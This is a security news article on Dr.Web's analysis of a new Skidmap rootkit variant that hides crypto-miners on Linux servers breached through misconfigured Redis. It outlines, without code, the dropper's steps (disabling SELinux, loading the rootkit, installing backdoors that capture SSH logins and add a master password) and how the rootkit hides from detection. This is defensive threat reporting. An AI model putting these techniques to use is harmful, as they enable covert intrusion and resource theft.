Cybersecurity researchers at Dr.Web have uncovered a new modification of the Skidmap rootkit, a sophisticated malware targeting Linux systems to covertly install crypto-mining trojans. This latest variant employs advanced techniques to conceal its activities, posing a significant threat to enterprise servers and cloud environments.
The Anatomy of Skidmap’s Latest Attack
The Skidmap rootkit operates as a malicious kernel module, effectively hiding the crypto-miner’s activities by manipulating CPU load and network activity information. This approach makes it extremely difficult for system administrators to detect the presence of unauthorized mining operations.
Dr.Web’s experts note that these attacks are widespread and primarily target the corporate sector, where high-performance servers and cloud infrastructures provide optimal conditions for efficient crypto-mining operations.
Exploiting Redis Vulnerabilities
The researchers identified that many of these attacks exploit vulnerabilities in Redis, an open-source, in-memory data structure store. Redis was not originally designed for deployment on network edges, and its default configuration offers only basic security features. Versions prior to 6.0 lack access control and encryption mechanisms, making them particularly vulnerable to exploitation.
Honeypot Revelations
To better understand the threat, Dr.Web set up a honeypot: an unprotected Redis server. Over the course of a year, this decoy server faced between 10,000 to 14,000 attack attempts monthly. Recently, it was infected with the Skidmap malware, which employed a new concealment method and installed four separate backdoors on the compromised system.
Skidmap’s Evolution and Infection Process
Although Skidmap has been known since 2019, its core functionality remains consistent. The malware typically infiltrates systems by exploiting vulnerabilities or misconfigurations in software. In the case of Dr.Web’s honeypot, attackers added tasks to the cron scheduler, downloading a dropper (Linux.MulDrop.142 or Linux.MulDrop.143) every 10 minutes.
This executable file performs several actions:
- Checks the OS kernel version
- Disables the SELinux protective module
- Unpacks the Linux.Rootkit.400 rootkit
- Installs the Linux.BtcMine.815 miner
- Deploys multiple backdoors (Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426, and Linux.BackDoor.RCTL.2)
Advanced Evasion Techniques
The rootkit intercepts specific system calls, providing fake information in response to diagnostic commands. It also prevents the loading of kernel modules that could detect its presence. This comprehensive approach effectively conceals all aspects of the miner’s activities, including computations, hash submissions, and task reception.
The installed backdoors serve multiple purposes, including:
- Capturing and transmitting data about all SSH authorizations
- Creating a master password for all system accounts
- Enabling remote access and control through the Linux.BackDoor.RCTL.2 RAT trojan
Detection Challenges and Implications
Detecting a rootkit-concealed miner in a server cluster is a non-trivial task. Without reliable resource consumption data, the only indicators of compromise may be excessive energy consumption and increased heat generation. This stealth capability, combined with the attackers’ ability to fine-tune mining operations for optimal performance, makes Skidmap a formidable threat to enterprise cybersecurity.
The evolution of Skidmap demonstrates an increasing complexity in attack methodologies. The malware’s ability to disable protective systems, interfere with numerous system utilities and services, and deploy rootkits significantly complicates incident response efforts. As crypto-mining attacks continue to target high-value enterprise infrastructure, organizations must remain vigilant and implement robust security measures to protect their assets from these sophisticated threats.